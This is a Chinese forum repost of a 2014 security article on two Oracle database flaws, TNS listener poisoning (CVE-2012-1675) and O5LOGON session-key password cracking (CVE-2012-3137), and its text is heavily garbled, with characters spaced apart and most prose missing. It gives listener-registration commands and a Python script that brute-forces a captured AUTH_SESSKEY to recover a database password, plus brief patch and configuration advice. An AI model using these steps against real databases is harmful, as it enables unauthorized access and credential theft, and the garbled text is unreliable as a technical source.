搜索

[8500] 2014-12-16_Oracle数据库漏洞分析:无需用户名和密码进入你的数据库

文档创建者:s7ckTeam
浏览次数:31
最后更新:2025-01-17
2014-12-16_Oracle数据库漏洞分析:无需用户名和密码进入你的数据库 O r a c l e F r e e B u f   2 0 1 4 - 1 2 - 1 6 2 0 1 2 O r a c l e / O r a c l e C V E - 2 0 1 2 - 1 6 7 5 C V E - 2 0 1 2 - 3 1 3 7 O r a c l e O r a c l e O r a c l e / O r a c l e 1 C V E - 2 0 1 2 - 1 6 7 5 C V E - 2 0 1 2 - 3 1 3 7 o r a c l e C V E - 2 0 1 2 - 1 6 7 5 O r a c l e / T N S   L i s t e n e r T N S L i s t e n e r C V E - 2 0 1 2 - 3 1 3 7 O r a c l e   D a t a b a s e   1 0 g / 1 1 g 线 O r a c l e 1 C V E - 2 0 1 2 - 1 6 7 5 T N S 2 T N S 3 4 C V E - 2 0 1 2 - 3 1 3 7 5 线 6 / O r a c l e O r a c l e 访 2 C V E - 2 0 1 2 - 1 6 7 5 T N S O r a c l e O r a c l e C V E - 2 0 1 2 - 1 6 7 5 T N S T N S o r a c l e   I P o r a c l e D B M S 2 访 访 T N S 1 . 2 .   t n s n a m e s . o r a   l i s t e n e r _ n a m e =         ( D E S C R I P T I O N =         ( A D D R E S S = ( P R O T O C O L = t c p ) ( H O S T = I P ) ( P O R T = ) ) ) 3 . S Q L * P l u s       1 . $   s q l p l u s   /   a s   s y s d b a     2 .   S Q L >   A L T E R   S Y S T E M   S E T R E M O T E _ L I S T E N E R = ' L I S T E N E R _ N A M E ' ;     3 .   S Q L >   A L T E R   S Y S T E M   R E G I S T E R ; 4 .
2 访 2 1 9 6 1 1 3 8 3 l o c a l   s e r v e r     r e m o t e   s e r v e r I P 4 A U T H _ S E S S K E Y A U T H _ S E S S K E Y _ C L I E N T A U T H _ P A S S W O R D A U T H _ V F R _ D A T A 3 C V E - 2 0 1 2 - 3 1 3 7 C V E - 2 0 1 2 - 3 1 3 7 1 1 . 2 . 0 . 3 1 1 . 2 . 0 . 2 1 1 . 1 . 0 . 7 , 使 使 S H A - 1 1 0 . 2 . 0 . 5 1 0 . 2 . 0 . 4 使 使 S H A - 1 1 0 . 2 . 0 . 3 z / O S 1 1 . 2 . 0 . 3 1 1 . 2 . 0 . 3 s q l n e t . o r a S Q L N E T . A L L O W E D _ L O G O N _ V E R S I O N = 1 2 C V E - 2 0 1 2 - 3 1 3 7 O r a c l e o r a c l e 1 1 . 1 o r a c l e 使 O 3 l o g o n o r a c l e   9 6 2 0 A U T H _ S E S S K E Y . . . . . C O C D D 8 9 F I G O D K W A S D F 9 6 6 4 1 6
T N S A U T H _ S E S S K E Y A U T H _ S E S S K E Y _ C L I E N T A U T H _ P A S S W O R D A U T H _ V F R _ D A T A S H A 1 , M D 5 A E S 1 9 2   i m p o r t   h a s h l i b         f r o m   C r y p t o . C i p h e r   i m p o r t   A E S                     d e f   d e c r y p t ( s e s s i o n , s a l t , p a s s w o r d ) :                         p a s s _ h a s h =   h a s h l i b . s h a 1 ( p a s s w o r d + s a l t )                         k e y   = p a s s _ h a s h . d i g e s t ( )   +   ' x 0 0 x 0 0 x 0 0 x 0 0 '                         d e c r y p t o r =   A E S . n e w ( k e y , A E S . M O D E _ C B C )                         p l a i n   = d e c r y p t o r . d e c r y p t ( s e s s i o n )                         r e t u r n p l a i n         s e s s i o n _ h e x   = ' E A 2 0 4 3 C B 8 B 4 6 E 3 8 6 4 3 1 1 C 6 8 B D C 1 6 1 F 8 C A 1 7 0 3 6 3 C 1 E 6 F 5 7 F 3 E B C 6 4 3 5 F 5 4 1 A 8 2 3 9 B 6 D B A 1 6 E A A B 5 4 2 2 5 5 3 A 7 5 9 8 1 4 3 E 7 8 7 6 7 '                     s a l t _ h e x   =   ' A 7 1 9 3 E 5 4 6 3 7 7 E C 5 6 6 3 9 E '                     p a s s w o r d s   =   [ ' t e s t ' , ' p a s s w o r d ' , ' ' o r a c l e ' , ' d e m o ' ]                     f o r   p a s s w o r d   i n   p a s s w o r d s :                         s e s s i o n _ i d =   d e c r y p t ( s e s s i o n _ h e x . d e c o d e ( ' h e x ' ) , s a l t _ h e x . d e c o d e ( ' h e x ' ) , p a s s w o r d )                         p r i n t ' D e c r y p t e d   s e s s i o n _ i d   f o r   p a s s w o r d   " % s "   i s   % s '   % ( p a s s w o r d , s e s s i o n _ i d . e n c o d e ( ' h e x ' ) )                         i f s e s s i o n _ i d [ 4 0 : ]   = =   ' x 0 8 x 0 8 x 0 8 x 0 8 x 0 8 x 0 8 x 0 8 x 0 8 ' :                                         p r i n t ' P A S S W O R D   I S   " % s " '   %   p a s s w o r d                                         b r e a k 4 1 O r a c l e O r a c l e c p u o c t 2 0 1 2 - 1 5 1 5 8 9 3 c p u o c t 2 0 1 2 - 1 5 1 5 8 9 3 访 O r a c l e 2 O r a c l e C V E - 2 0 1 2 - 3 1 3 7 C V E - 2 0 1 2 - 1 6 7 5 3 使 8 [ / F r e e B u f F r e e B u f . C O M ]
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理